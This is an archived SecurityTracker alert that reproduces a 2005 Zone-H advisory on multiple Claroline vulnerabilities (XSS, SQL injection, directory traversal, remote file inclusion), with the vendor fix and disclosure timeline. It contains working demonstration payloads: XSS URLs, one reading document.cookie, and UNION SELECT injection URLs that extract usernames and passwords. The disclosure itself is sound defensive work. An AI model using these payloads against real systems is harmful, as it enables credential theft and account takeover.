SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Claroline Vendors:   Claroline.net
Claroline Lets Remote Users Execute Arbitrary Commands, View Files, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013822
SecurityTracker URL:  http://securitytracker.com/id/1013822
CVE Reference:   CVE-2005-1374, CVE-2005-1375, CVE-2005-1376, CVE-2005-1377   (Links to External Site)
Updated:  May 3 2005
Original Entry Date:  Apr 28 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of system information, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 1.5.4; also 1.6 beta and 1.6 RC1
Description:   Kevin Fernandez "Siegfried" from Zone-H reported several vulnerabilities in Claroline. A remote user can view files on the target system, execute arbitrary commands on the target system, inject SQL commands, and conduct cross-site scripting attacks.

The software does not properly validate user-supplied input in several scripts and several parameters.

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Claroline software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. The following pages are affected:

claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php

Additional pages are affected.

Some demonstration exploit URLs are provided:

claroline/tracking/toolaccess_details.php?tool=3D%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=3Ddoc&data=3D%3Cscript%3Ealert('xss');%3C/script%3E
claroline/calendar/myagenda.php?coursePath=3D%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database via the following scripts:

claroline/learnPath/learningPath.php
claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php

A demonstration exploit URL is provided:

claroline/user/userInfo.php?uInfo=3D-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=3D1/*
claroline/tracking/exercises_details.php?exo_id=3D-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=3D1--

The 'claroline/document/document.php' and 'claroline/learnPath/insertMyDoc.php' scripts allow remote authenticated administrators to upload files to arbitrary folders and to view, copy, move, and delete arbitrary directories.

A remote user can cause the system to include and execute PHP code located on a remote site. The PHP code, including operating system commands, will run with the privileges of the target web service.

The vendor was notified on April 22, 2005.

Kevin Fernandez "Siegfried" and Mehdi Oudad "deepfear" from the Zone-H Research Team discovered these vulnerabilities.

Impact:   A remote user can execute PHP code and operating system commands with the privileges of the target web service.

A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Claroline software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote emote authenticated administrator can upload files to arbitrary directories and can view, copy, move, and delete arbitrary directories.

Solution:   The vendor has issued a fixed version (1.5.4 and later), available at:

http://www.claroline.net/download.htm

Vendor URL:  www.claroline.net/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  ZRCSA-200501 - Multiple vulnerabilities in Claroline


Zone-H Research Center Security Advisory 200501
http://fr.zone-h.org

Date of release: 27/04/2005

Software: Claroline (www.claroline.net)

Affected versions:=20
1.5.3
1.6 beta
1.6 Release Candidate 1
(probably previous versions too)

Risk: High

Discovered by:
Kevin Fernandez "Siegfried"
Mehdi Oudad "deepfear"
from the Zone-H Research Team

Background (from their web site)
----------
Claroline is an Open Source software based on PHP/MySQL. It's a =
collaborative learning environment allowing teachers or education =
institutions to create and administer courses through the web.

Description
-----------
Multiple Cross site scripting, 10 SQL injection, 7 directory traversal =
and 4 remote file inclusion vulnerabilities have been found in =
Claroline.


Details
-------

1)Multiple Cross site scripting vulnerabilities have been found in the =
following pages:
claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php
[..]

Examples:
claroline/tracking/toolaccess_details.php?tool=3D%3Cscript%3Ealert('xss')=
;%3C/script%3E
claroline/tracking/user_access_details.php?cmd=3Ddoc&data=3D%3Cscript%3Ea=
lert('xss');%3C/script%3E
claroline/calendar/myagenda.php?coursePath=3D%3E%3Cscript%3Ealert(documen=
t.cookie)%3C/script%3E
[..]

2)10 SQL injections have been found, they could be exploited by users to =
retrieve the passwords of the admin, arbitrary teachers or students.
claroline/learnPath/learningPath.php (3)
claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php

Examples:
claroline/user/userInfo.php?uInfo=3D-1%20UNION%20SELECT%20username,passwo=
rd,0,0,0,0,0%20from%20user%20where%20user_id=3D1/*
claroline/tracking/exercises_details.php?exo_id=3D-1/**/UNION/**/SELECT%2=
00,password,username,0,0,0%20from%20user%20where%20user_id=3D1--
[..]

3)Multiple directory traversal vulnerabilities in =
"claroline/document/document.php" and =
"claroline/learnPath/insertMyDoc.php" could allow project administrators =
(teachers) to upload files in arbitrary folders or copy/move/delete =
(then view) files of arbitrary folders by performing directory traversal =
attacks.

4)Four remote file inclusion vulnerabilities have been discovered.

Solution
--------
The Claroline users are urged to update to version 1.54 or 1.6 final:
http://www.claroline.net/download.htm

See also:
http://www.claroline.net/news.php#85
http://www.claroline.net/news.php#86

Timeline
--------
18/04 Vulnerabilities found
22/04 Vendor contacted (quick answer)
25/04 Claroline 1.54 released
26/04 Claroline 1.6 final released
27/04 Users alerted via the mailing list
27/04 Advisory released

French version available here: =
http://fr.zone-h.org/fr/advisories/read/id=3D180/
English version: http://www.zone-h.org/advisories/read/id=3D7472

Zone-H Research Center
http://fr.zone-h.org

Join us on #zone-h @ irc.eu.freenode.net

You can contact the team leader at deepfear@fr.zone-h.org

Thanks to University Montpellier 2.
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC